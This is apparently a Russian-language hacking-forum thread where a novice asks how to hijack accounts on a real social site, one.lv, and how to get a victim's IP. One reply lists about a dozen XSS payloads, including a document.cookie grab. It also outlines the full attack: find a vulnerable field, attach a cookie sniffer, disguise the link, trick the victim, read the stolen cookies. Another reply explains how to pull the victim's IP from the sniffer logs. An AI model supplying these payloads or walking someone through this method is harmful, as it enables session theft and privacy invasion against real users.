Люди помогите! Прочитал вот это и толком ничего не понял можно как то совсем подробно разжевать? Куда заходить, что нажимать и куда что пихать.... Я совсем ламер если что. Меня интересует что бы это работало на www.one.lv Или помогите на практике. Могу дать аккаунт для опытов, если кто решит помоч. P.S. В гугл просьба непосылать, там кроме этой статьи ничего нет. P.S.S. Еще вопрос. Можно ли этим методом узнать ip жертвы и как можно больше инфы?
Логинься и подставляй во все поля всевозможные комбинации: Code: <img src="javascript:alert('XSS')"</img> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert("XSS")> <IMG """><SCRIPT>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=javascript:alert('XSS')> <IMG SRC=javascript:alert('XSS')> <<SCRIPT>alert("XSS");//<</SCRIPT> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> "><script>alert(document.cookie)</script> Найдешь, прицепишь сниффер, зашифруешь ссылку здесь, впаришь жертве, проверишь лог сниффера - куки твои.
Если чесно, я когда изучал xss тоже ничего по этой статье непонял, до меня долго доходило, надо сам смысл почувствовать. А вот про то что в гугле только одна страница - убило. В логах сниффера будет айпи, в поле реферер или аналогичном ему.
Ну вроде разобрался....Появилась другая проблема... Опыты ставил на форуме.Когда я из этого списка вставляю по одной строке, то мне ее и пишет. А когда я пытался засунуть весь список, то он почти на всех строках выдавал значок (картинка) и писал что "много кодировки,нельзя загрузить" Вот с этим как быть? P.S. Форма отправки сообщений юзеру и сообщений на форум одинакова.
